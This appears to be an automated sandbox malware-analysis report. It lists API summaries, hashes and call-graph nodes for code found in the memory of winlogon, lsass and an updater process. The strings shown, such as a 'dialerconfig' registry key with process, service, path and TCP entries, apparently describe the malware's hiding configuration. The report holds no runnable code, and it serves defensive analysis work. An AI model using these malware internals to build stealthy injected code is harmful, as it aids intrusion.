                                                              • API String ID: 592178966-4215709766
                                                              • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                              • Instruction ID: 33387b3a89b0f7cf97b4c9f63ea1e6ce0b438a2dcf969175634c70bf0c094b31
                                                              • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                              • Instruction Fuzzy Hash: F9E0CD61A01F44D0DF118F65D4441D87360E75CB69F88D222CD4C47311FB38D1E5C300
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071140080.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc670000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: __std_exception_copy
                                                              • String ID: Locator'$riptor at (
                                                              • API String ID: 592178966-4215709766
                                                              • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                              • Instruction ID: 5795fbfa8a47514ff8c6ddda118d1662a7868f1be9d24305db9b02968eedc405
                                                              • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                              • Instruction Fuzzy Hash: 28E08661640F8490EF018F65D4401987360EB5CB55B88D122C95C06351FA38D1E5C301
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID:
                                                              • API String ID: 756756679-0
                                                              • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                              • Instruction ID: 435233d5cd765dd7833698f1ddb9f59ae8d1156237805913c2fcddc5f4e0a6b6
                                                              • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                              • Instruction Fuzzy Hash: B2119129615F5492EB54DFAEA80C26973A1FB89FC2F188065DE4E53765DF38C442C300
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID:
                                                              • API String ID: 756756679-0
                                                              • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                              • Instruction ID: 1420031e885aaf21fcc6fdccc82258bc3790c71e1673b6532d453dab14891ff2
                                                              • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                              • Instruction Fuzzy Hash: 95115129601F64E2EA54DFAEA44C22977A5FB89FC2F188025DE4E97765DF38C442C300
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1617791916-0
                                                              • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                              • Instruction ID: 46137aeb2ac080d4014b8e101a3abee4704eba82c5d2520b876412a79b8151bf
                                                              • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                              • Instruction Fuzzy Hash: 77E06D39621E1486EB548FEAD80C36A36E1FB89F06F14C024CA0907751DF7DC499C750
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3071355596.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc6a0000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1617791916-0
                                                              • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                              • Instruction ID: 5f6bbecbb8621be69b39046fe70b37093b4047639506c31062e86b7116282652
                                                              • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                              • Instruction Fuzzy Hash: 3EE03239A01E1486EB088BAAD80834A36E2EB89B07F08C0248A0907361DF7DC499CB90
                                                              Memory Dump Source
                                                              • Source File: 00000023.00000002.1765916876.00007FF671C91000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF671C90000, based on PE: true
                                                              • Associated: 00000023.00000002.1765834841.00007FF671C90000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000023.00000002.1766016367.00007FF671CA4000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000023.00000002.1766124143.00007FF671CA8000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000023.00000002.1767172052.00007FF671F27000.00000008.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000023.00000002.1768091820.00007FF67219D000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000023.00000002.1768174212.00007FF6721D6000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000023.00000002.1768213648.00007FF6721D9000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_35_2_7ff671c90000_updater.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 468899d511a3580b8016a16ee82124799021391b29db4fe74c236ec62e562d6c
                                                              • Instruction ID: 0e17ceffaecce42c6e047c961318c96bc8801b57e19ee03381d9752b300a025b
                                                              • Opcode Fuzzy Hash: 468899d511a3580b8016a16ee82124799021391b29db4fe74c236ec62e562d6c
                                                              • Instruction Fuzzy Hash: A7B01272D2430988E3012FC1E84235832706B08781F600032C60C473A2CF7D50404B10

                                                              Execution Graph

                                                              Execution Coverage:1.2%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:269
                                                              Total number of Limit Nodes:18
                                                              execution_graph 14840 202c0ab273c 14841 202c0ab276a 14840->14841 14842 202c0ab2858 LoadLibraryA 14841->14842 14843 202c0ab28d4 14841->14843 14842->14841 14844 202c0ae202c 14845 202c0ae205d 14844->14845 14846 202c0ae2081 14845->14846 14847 202c0ae2173 14845->14847 14857 202c0ae213e 14845->14857 14852 202c0ae20b9 StrCmpNIW 14846->14852 14855 202c0ae20e0 14846->14855 14846->14857 14848 202c0ae2178 14847->14848 14849 202c0ae21e7 14847->14849 14865 202c0ae2f04 GetProcessHeap HeapAlloc 14848->14865 14851 202c0ae21ec 14849->14851 14849->14857 14853 202c0ae2f04 11 API calls 14851->14853 14852->14846 14854 202c0ae2190 14853->14854 14854->14857 14855->14846 14858 202c0ae1bf4 14855->14858 14859 202c0ae1c8f 14858->14859 14860 202c0ae1c1b GetProcessHeap HeapAlloc 14858->14860 14859->14855 14860->14859 14861 202c0ae1c56 14860->14861 14862 202c0ae1c77 GetProcessHeap HeapFree 14861->14862 14871 202c0ae152c 14861->14871 14862->14859 14869 202c0ae2f57 14865->14869 14866 202c0ae3015 GetProcessHeap HeapFree 14866->14854 14867 202c0ae3010 14867->14866 14868 202c0ae2fa2 StrCmpNIW 14868->14869 14869->14866 14869->14867 14869->14868 14870 202c0ae1bf4 6 API calls 14869->14870 14870->14869 14872 202c0ae157c 14871->14872 14875 202c0ae1546 14871->14875 14872->14862 14873 202c0ae155d StrCmpIW 14873->14875 14874 202c0ae1565 StrCmpW 14874->14875 14875->14872 14875->14873 14875->14874 14876 202c0ae1abc 14881 202c0ae1628 GetProcessHeap HeapAlloc 14876->14881 14878 202c0ae1ad2 Sleep SleepEx 14879 202c0ae1acb 14878->14879 14879->14878 14880 202c0ae1598 StrCmpIW StrCmpW 14879->14880 14880->14879 14932 202c0ae1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14881->14932 14883 202c0ae1650 14933 202c0ae1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14883->14933 14885 202c0ae1658 14934 202c0ae1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14885->14934 14887 202c0ae1661 14935 202c0ae1268 GetProcessHeap HeapAlloc 
GetProcessHeap HeapAlloc 14887->14935 14889 202c0ae166a 14936 202c0ae1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14889->14936 14891 202c0ae1673 14937 202c0ae1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14891->14937 14893 202c0ae167c 14938 202c0ae1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14893->14938 14895 202c0ae1685 14939 202c0ae1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14895->14939 14897 202c0ae168e RegOpenKeyExW 14898 202c0ae16c0 RegOpenKeyExW 14897->14898 14899 202c0ae18a6 14897->14899 14900 202c0ae16ff RegOpenKeyExW 14898->14900 14901 202c0ae16e9 14898->14901 14899->14879 14902 202c0ae173a RegOpenKeyExW 14900->14902 14903 202c0ae1723 14900->14903 14946 202c0ae12bc RegQueryInfoKeyW 14901->14946 14907 202c0ae175e 14902->14907 14908 202c0ae1775 RegOpenKeyExW 14902->14908 14940 202c0ae104c RegQueryInfoKeyW 14903->14940 14910 202c0ae12bc 16 API calls 14907->14910 14911 202c0ae17b0 RegOpenKeyExW 14908->14911 14912 202c0ae1799 14908->14912 14913 202c0ae176b RegCloseKey 14910->14913 14915 202c0ae17eb RegOpenKeyExW 14911->14915 14916 202c0ae17d4 14911->14916 14914 202c0ae12bc 16 API calls 14912->14914 14913->14908 14919 202c0ae17a6 RegCloseKey 14914->14919 14917 202c0ae180f 14915->14917 14918 202c0ae1826 RegOpenKeyExW 14915->14918 14920 202c0ae12bc 16 API calls 14916->14920 14922 202c0ae104c 6 API calls 14917->14922 14923 202c0ae1861 RegOpenKeyExW 14918->14923 14924 202c0ae184a 14918->14924 14919->14911 14921 202c0ae17e1 RegCloseKey 14920->14921 14921->14915 14925 202c0ae181c RegCloseKey 14922->14925 14927 202c0ae189c RegCloseKey 14923->14927 14928 202c0ae1885 14923->14928 14926 202c0ae104c 6 API calls 14924->14926 14925->14918 14929 202c0ae1857 RegCloseKey 14926->14929 14927->14899 14930 202c0ae104c 6 API calls 14928->14930 14929->14923 14931 202c0ae1892 RegCloseKey 14930->14931 14931->14927 14932->14883 14933->14885 14934->14887 14935->14889 14936->14891 14937->14893 14938->14895 14939->14897 14941 202c0ae10bf 
14940->14941 14942 202c0ae11b5 RegCloseKey 14940->14942 14941->14942 14943 202c0ae10cf RegEnumValueW 14941->14943 14942->14902 14944 202c0ae1125 14943->14944 14944->14942 14944->14943 14945 202c0ae114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14944->14945 14945->14944 14947 202c0ae148a RegCloseKey 14946->14947 14948 202c0ae1327 GetProcessHeap HeapAlloc 14946->14948 14947->14900 14949 202c0ae1476 GetProcessHeap HeapFree 14948->14949 14950 202c0ae1352 RegEnumValueW 14948->14950 14949->14947 14951 202c0ae13a5 14950->14951 14951->14949 14951->14950 14952 202c0ae152c 2 API calls 14951->14952 14953 202c0ae141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 14951->14953 14954 202c0ae13d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 14951->14954 14952->14951 14953->14951 14954->14953 14955 202c0ae253c 14957 202c0ae25bb 14955->14957 14956 202c0ae27aa 14957->14956 14958 202c0ae261d GetFileType 14957->14958 14959 202c0ae2641 14958->14959 14960 202c0ae262b StrCpyW 14958->14960 14971 202c0ae1a40 GetFinalPathNameByHandleW 14959->14971 14961 202c0ae2650 14960->14961 14965 202c0ae265a 14961->14965 14969 202c0ae26ff 14961->14969 14964 202c0ae3844 StrCmpNIW 14964->14969 14965->14956 14976 202c0ae3844 14965->14976 14979 202c0ae3044 StrCmpIW 14965->14979 14983 202c0ae1cac 14965->14983 14968 202c0ae3044 4 API calls 14968->14969 14969->14956 14969->14964 14969->14968 14970 202c0ae1cac 2 API calls 14969->14970 14970->14969 14972 202c0ae1a6a StrCmpNIW 14971->14972 14973 202c0ae1aa9 14971->14973 14972->14973 14974 202c0ae1a84 lstrlenW 14972->14974 14973->14961 14974->14973 14975 202c0ae1a96 StrCpyW 14974->14975 14975->14973 14977 202c0ae3851 StrCmpNIW 14976->14977 14978 202c0ae3866 14976->14978 14977->14978 14978->14965 14980 202c0ae308d PathCombineW 14979->14980 14981 202c0ae3076 StrCpyW StrCatW 14979->14981 14982 202c0ae3096 14980->14982 14981->14982 14982->14965 14984 202c0ae1ccc 14983->14984 14985 202c0ae1cc3 14983->14985 14984->14965 14986 202c0ae152c 2 API calls 14985->14986 
14986->14984 14987 202c0aed6cc 14992 202c0aed6dd __free_lconv_mon 14987->14992 14988 202c0aed72e 14993 202c0aed6ac 14988->14993 14989 202c0aed712 HeapAlloc 14990 202c0aed72c 14989->14990 14989->14992 14992->14988 14992->14989 14996 202c0aecfa0 14993->14996 14995 202c0aed6b5 14995->14990 14998 202c0aecfb5 __vcrt_InitializeCriticalSectionEx 14996->14998 14997 202c0aecfe1 FlsSetValue 14999 202c0aecff3 14997->14999 15002 202c0aecfd1 _invalid_parameter_noinfo 14997->15002 14998->14997 14998->15002 15012 202c0aed6cc 14999->15012 15002->14995 15003 202c0aed020 FlsSetValue 15005 202c0aed03e 15003->15005 15006 202c0aed02c FlsSetValue 15003->15006 15004 202c0aed010 FlsSetValue 15007 202c0aed019 15004->15007 15023 202c0aecb94 15005->15023 15006->15007 15018 202c0aed744 15007->15018 15011 202c0aed744 __free_lconv_mon 2 API calls 15011->15002 15017 202c0aed6dd __free_lconv_mon 15012->15017 15013 202c0aed72e 15016 202c0aed6ac __free_lconv_mon 5 API calls 15013->15016 15014 202c0aed712 HeapAlloc 15015 202c0aed002 15014->15015 15014->15017 15015->15003 15015->15004 15016->15015 15017->15013 15017->15014 15019 202c0aed749 HeapFree 15018->15019 15020 202c0aed77a 15018->15020 15019->15020 15021 202c0aed764 __free_lconv_mon __vcrt_InitializeCriticalSectionEx 15019->15021 15020->15002 15022 202c0aed6ac __free_lconv_mon 5 API calls 15021->15022 15022->15020 15024 202c0aecc46 __free_lconv_mon 15023->15024 15027 202c0aecaec 15024->15027 15026 202c0aecc5b 15026->15011 15028 202c0aecb08 15027->15028 15031 202c0aecd7c 15028->15031 15030 202c0aecb1e 15030->15026 15032 202c0aecdc4 Concurrency::details::SchedulerProxy::DeleteThis 15031->15032 15033 202c0aecd98 Concurrency::details::SchedulerProxy::DeleteThis 15031->15033 15032->15030 15033->15032 15035 202c0af07b4 15033->15035 15036 202c0af0850 15035->15036 15039 202c0af07d7 15035->15039 15037 202c0af08a3 15036->15037 15040 202c0aed744 __free_lconv_mon 6 API calls 15036->15040 15101 202c0af0954 15037->15101 15039->15036 15041 202c0af0816 
15039->15041 15046 202c0aed744 __free_lconv_mon 6 API calls 15039->15046 15042 202c0af0874 15040->15042 15043 202c0af0838 15041->15043 15049 202c0aed744 __free_lconv_mon 6 API calls 15041->15049 15044 202c0aed744 __free_lconv_mon 6 API calls 15042->15044 15045 202c0aed744 __free_lconv_mon 6 API calls 15043->15045 15047 202c0af0888 15044->15047 15051 202c0af0844 15045->15051 15052 202c0af080a 15046->15052 15048 202c0aed744 __free_lconv_mon 6 API calls 15047->15048 15053 202c0af0897 15048->15053 15054 202c0af082c 15049->15054 15050 202c0af090e 15055 202c0aed744 __free_lconv_mon 6 API calls 15051->15055 15061 202c0af2fc8 15052->15061 15058 202c0aed744 __free_lconv_mon 6 API calls 15053->15058 15089 202c0af30d4 15054->15089 15055->15036 15056 202c0aed744 6 API calls __free_lconv_mon 15060 202c0af08af 15056->15060 15058->15037 15060->15050 15060->15056 15062 202c0af2fd1 15061->15062 15087 202c0af30cc 15061->15087 15063 202c0af2feb 15062->15063 15064 202c0aed744 __free_lconv_mon 6 API calls 15062->15064 15065 202c0af2ffd 15063->15065 15066 202c0aed744 __free_lconv_mon 6 API calls 15063->15066 15064->15063 15067 202c0af300f 15065->15067 15068 202c0aed744 __free_lconv_mon 6 API calls 15065->15068 15066->15065 15069 202c0af3021 15067->15069 15070 202c0aed744 __free_lconv_mon 6 API calls 15067->15070 15068->15067 15071 202c0af3033 15069->15071 15072 202c0aed744 __free_lconv_mon 6 API calls 15069->15072 15070->15069 15073 202c0af3045 15071->15073 15074 202c0aed744 __free_lconv_mon 6 API calls 15071->15074 15072->15071 15075 202c0af3057 15073->15075 15076 202c0aed744 __free_lconv_mon 6 API calls 15073->15076 15074->15073 15077 202c0af3069 15075->15077 15078 202c0aed744 __free_lconv_mon 6 API calls 15075->15078 15076->15075 15079 202c0af307b 15077->15079 15080 202c0aed744 __free_lconv_mon 6 API calls 15077->15080 15078->15077 15081 202c0af308d 15079->15081 15082 202c0aed744 __free_lconv_mon 6 API calls 15079->15082 15080->15079 15083 202c0af30a2 15081->15083 15085 202c0aed744 
__free_lconv_mon 6 API calls 15081->15085 15082->15081 15084 202c0af30b7 15083->15084 15086 202c0aed744 __free_lconv_mon 6 API calls 15083->15086 15084->15087 15088 202c0aed744 __free_lconv_mon 6 API calls 15084->15088 15085->15083 15086->15084 15087->15041 15088->15087 15090 202c0af30d9 15089->15090 15099 202c0af313a 15089->15099 15091 202c0af30f2 15090->15091 15092 202c0aed744 __free_lconv_mon 6 API calls 15090->15092 15093 202c0af3104 15091->15093 15094 202c0aed744 __free_lconv_mon 6 API calls 15091->15094 15092->15091 15095 202c0aed744 __free_lconv_mon 6 API calls 15093->15095 15097 202c0af3116 15093->15097 15094->15093 15095->15097 15096 202c0af3128 15096->15099 15100 202c0aed744 __free_lconv_mon 6 API calls 15096->15100 15097->15096 15098 202c0aed744 __free_lconv_mon 6 API calls 15097->15098 15098->15096 15099->15043 15100->15099 15102 202c0af0985 15101->15102 15103 202c0af0959 15101->15103 15102->15060 15103->15102 15107 202c0af3174 15103->15107 15106 202c0aed744 __free_lconv_mon 6 API calls 15106->15102 15108 202c0af317d 15107->15108 15109 202c0af097d 15107->15109 15143 202c0af3140 15108->15143 15109->15106 15112 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15113 202c0af31a6 15112->15113 15114 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15113->15114 15115 202c0af31b4 15114->15115 15116 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15115->15116 15117 202c0af31c2 15116->15117 15118 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15117->15118 15119 202c0af31d1 15118->15119 15120 202c0aed744 __free_lconv_mon 6 API calls 15119->15120 15121 202c0af31dd 15120->15121 15122 202c0aed744 __free_lconv_mon 6 API calls 15121->15122 15123 202c0af31e9 15122->15123 15124 202c0aed744 __free_lconv_mon 6 API calls 15123->15124 15125 202c0af31f5 15124->15125 15126 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15125->15126 15127 202c0af3203 
15126->15127 15128 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15127->15128 15129 202c0af3211 15128->15129 15130 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15129->15130 15131 202c0af321f 15130->15131 15132 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15131->15132 15133 202c0af322d 15132->15133 15134 202c0af3140 Concurrency::details::SchedulerProxy::DeleteThis 6 API calls 15133->15134 15135 202c0af323c 15134->15135 15136 202c0aed744 __free_lconv_mon 6 API calls 15135->15136 15137 202c0af3248 15136->15137 15138 202c0aed744 __free_lconv_mon 6 API calls 15137->15138 15139 202c0af3254 15138->15139 15140 202c0aed744 __free_lconv_mon 6 API calls 15139->15140 15141 202c0af3260 15140->15141 15142 202c0aed744 __free_lconv_mon 6 API calls 15141->15142 15142->15109 15144 202c0af3167 15143->15144 15145 202c0af3156 15143->15145 15144->15112 15145->15144 15146 202c0aed744 __free_lconv_mon 6 API calls 15145->15146 15146->15145

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 56 202c0ae253c-202c0ae25c0 call 202c0b02cc0 59 202c0ae27d8-202c0ae27fb 56->59 60 202c0ae25c6-202c0ae25c9 56->60 60->59 61 202c0ae25cf-202c0ae25dd 60->61 61->59 62 202c0ae25e3-202c0ae2629 call 202c0ae8c60 * 3 GetFileType 61->62 69 202c0ae2641-202c0ae264b call 202c0ae1a40 62->69 70 202c0ae262b-202c0ae263f StrCpyW 62->70 71 202c0ae2650-202c0ae2654 69->71 70->71 73 202c0ae26ff-202c0ae2704 71->73 74 202c0ae265a-202c0ae2673 call 202c0ae30a8 call 202c0ae3844 71->74 75 202c0ae2707-202c0ae270c 73->75 87 202c0ae26aa-202c0ae26f4 call 202c0b02cc0 74->87 88 202c0ae2675-202c0ae26a4 call 202c0ae30a8 call 202c0ae3044 call 202c0ae1cac 74->88 77 202c0ae270e-202c0ae2711 75->77 78 202c0ae2729 75->78 77->78 80 202c0ae2713-202c0ae2716 77->80 82 202c0ae272c-202c0ae2745 call 202c0ae30a8 call 202c0ae3844 78->82 80->78 83 202c0ae2718-202c0ae271b 80->83 97 202c0ae2787-202c0ae2789 82->97 98 202c0ae2747-202c0ae2776 call 202c0ae30a8 call 202c0ae3044 call 202c0ae1cac 82->98 83->78 86 202c0ae271d-202c0ae2720 83->86 86->78 91 202c0ae2722-202c0ae2727 86->91 87->59 99 202c0ae26fa 87->99 88->59 88->87 91->78 91->82 102 202c0ae27aa-202c0ae27ad 97->102 103 202c0ae278b-202c0ae27a5 97->103 98->97 120 202c0ae2778-202c0ae2783 98->120 99->74 106 202c0ae27af-202c0ae27b5 102->106 107 202c0ae27b7-202c0ae27ba 102->107 103->75 106->59 110 202c0ae27bc-202c0ae27bf 107->110 111 202c0ae27d5 107->111 110->111 114 202c0ae27c1-202c0ae27c4 110->114 111->59 114->111 115 202c0ae27c6-202c0ae27c9 114->115 115->111 117 202c0ae27cb-202c0ae27ce 115->117 117->111 119 202c0ae27d0-202c0ae27d3 117->119 119->59 119->111 120->59 121 202c0ae2785 120->121 121->75
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: FileType
                                                              • String ID: \\.\pipe\
                                                              • API String ID: 3081899298-91387939
                                                              • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                              • Instruction ID: 383afa285ac380fd55eaa2c4cb7d261a7defb1f4293108ecd3c580df2b121f06
                                                              • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                              • Instruction Fuzzy Hash: 517190362047C1C6F625DF2998CC3AE7794F389B84F560127DFAA53B8ADA35CA598700

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 123 202c0ae202c-202c0ae2057 call 202c0b02d00 125 202c0ae205d-202c0ae2066 123->125 126 202c0ae206f-202c0ae2072 125->126 127 202c0ae2068-202c0ae206c 125->127 128 202c0ae2078-202c0ae207b 126->128 129 202c0ae2223-202c0ae2243 126->129 127->126 130 202c0ae2081-202c0ae2093 128->130 131 202c0ae2173-202c0ae2176 128->131 130->129 134 202c0ae2099-202c0ae20a5 130->134 132 202c0ae2178-202c0ae2192 call 202c0ae2f04 131->132 133 202c0ae21e7-202c0ae21ea 131->133 132->129 143 202c0ae2198-202c0ae21ae 132->143 133->129 138 202c0ae21ec-202c0ae21ff call 202c0ae2f04 133->138 136 202c0ae20a7-202c0ae20b7 134->136 137 202c0ae20d3-202c0ae20de call 202c0ae1bbc 134->137 136->137 140 202c0ae20b9-202c0ae20d1 StrCmpNIW 136->140 144 202c0ae20ff-202c0ae2111 137->144 151 202c0ae20e0-202c0ae20f8 call 202c0ae1bf4 137->151 138->129 150 202c0ae2201-202c0ae2209 138->150 140->137 140->144 143->129 149 202c0ae21b0-202c0ae21cc 143->149 147 202c0ae2121-202c0ae2123 144->147 148 202c0ae2113-202c0ae2115 144->148 154 202c0ae212a 147->154 155 202c0ae2125-202c0ae2128 147->155 152 202c0ae211c-202c0ae211f 148->152 153 202c0ae2117-202c0ae211a 148->153 156 202c0ae21d0-202c0ae21e3 149->156 150->129 157 202c0ae220b-202c0ae2213 150->157 151->144 163 202c0ae20fa-202c0ae20fd 151->163 160 202c0ae212d-202c0ae2130 152->160 153->160 154->160 155->160 156->156 161 202c0ae21e5 156->161 162 202c0ae2216-202c0ae2221 157->162 164 202c0ae213e-202c0ae2141 160->164 165 202c0ae2132-202c0ae2138 160->165 161->129 162->129 162->162 163->160 164->129 166 202c0ae2147-202c0ae214b 164->166 165->134 165->164 167 202c0ae214d-202c0ae2150 166->167 168 202c0ae2162-202c0ae216e 166->168 167->129 169 202c0ae2156-202c0ae215b 167->169 168->129 169->166 170 202c0ae215d 169->170 170->129
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID: S$dialer
                                                              • API String ID: 756756679-3873981283
                                                              • Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                              • Instruction ID: 7d0801e181e7e1027f0f2556f8cd6da4d5c454e321737ababf7947f23bb56196
                                                              • Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                              • Instruction Fuzzy Hash: 5651AC32B107A4C6FB61CF29E88C6AD63E5F704784F069123DFA512B86DB35C969C300

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                              • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                              • API String ID: 2135414181-2879589442
                                                              • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction ID: 1d03e476145ce09beb9e97f2b7c5aab0935724522098279c66d9844aa9511552
                                                              • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction Fuzzy Hash: F2710636210B50C6FB109F25E8DCA9D23A9FB84F88F425123DB9E47B6ADE39C458C744

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: FinalHandleNamePathlstrlen
                                                              • String ID: \\?\
                                                              • API String ID: 2719912262-4282027825
                                                              • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                              • Instruction ID: 8c3d5dbfacf504bca622ea7f657326f4a67cd1e3c1ec290e5004b19a988dad2d
                                                              • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                              • Instruction Fuzzy Hash: BCF01922304781D2FB608B21E8CC76D6765F748BC8F958123DB994B966DA2DC68DCB00

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000024.00000002.3077497573.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_36_2_202c0ae0000_lsass.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1617791916-0
                                                              • Opcode ID: 5b325dc3880ca3c93f8f4c7f4460fba72f6c1ea06a067b14687c409243df247f
                                                              • Instruction ID: a5c4e77d733fc4bc935c336303e9112e94b6a16807bf59574ff5562d90f15684
                                                              • Opcode Fuzzy Hash: 5b325dc3880ca3c93f8f4c7f4460fba72f6c1ea06a067b14687c409243df247f
